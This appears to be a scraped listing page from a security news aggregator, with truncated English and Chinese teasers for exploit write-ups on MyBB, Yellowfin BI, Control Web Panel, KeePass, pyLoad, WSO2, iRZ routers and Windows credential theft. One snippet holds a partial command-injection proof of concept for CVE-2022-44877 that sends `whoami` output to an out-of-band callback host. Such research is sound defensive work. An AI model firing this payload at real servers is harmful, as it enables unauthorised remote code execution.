
MyBB <= 1.8.31: Remote Code Execution Chain

Visual editor persistent XSS CVE-2022-43707 (HIGH RISK) Some time ago, my colleague Igor Sak-Sakovskiy published an article: Fuzzing for XSS via ne...

Exploiting Hardcoded Keys to achieve RCE in Yellowfin BI

Introduction At Assetnote, we often audit enterprise software source code to discover pre-authentication vulnerabilities. Yellowfin BI had signific...

Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877

POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-url...

实战 | 从Wdigest绕过Credential Guard 获取明文密码

由 LSASS 进程加载的 wdigest.dll 模块有两个有趣的全局变量:g_fParameter_useLogonCredential 和 g_IsCredGuardEnabled,他们的作用仅从名称就能...

CVE-2023-24055 POC:KeePass through 2.53(在默认安装中)允许对 XML 配置文件具有写入

CVE-2023-24055CVE-2023-24055 的 POC 和扫描器配置扫描仪.py在 Windows 下运行的 KeePass 配置文件的简单解析器。该工具将打开目录 %APPDATA%RoamingKeePass...

CVE-2022-27226: CSRF to RCE in iRZ Mobile Routers through 2022-03-16

Credits Vulnerability Discovery John Jackson Chris Mack Exploit Development Stephen Chavez Robert Willis Identification Default credentials were...

CVE-2023-0297: Pre-auth RCE in pyLoad

CVE-2023-0297: Pre-auth RCE in pyLoad The Story of Finding Pre-auth RCE in pyLoad TL;DR A code injection vulnerability in pyLoad versions prior to...


一、约束性委派的原理:由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,引入了S4U,支持两个子协议:S4U...



CVE-2022-29464 WSO2文件上传漏洞复现

01漏洞简介CVE-2022-29464  WSO2文件上传漏洞是Orange Tsai发现的WSO2上的严重漏洞。该漏洞允许攻击者未授权上传jsp webshell从而在WSO2服务器上执行任...
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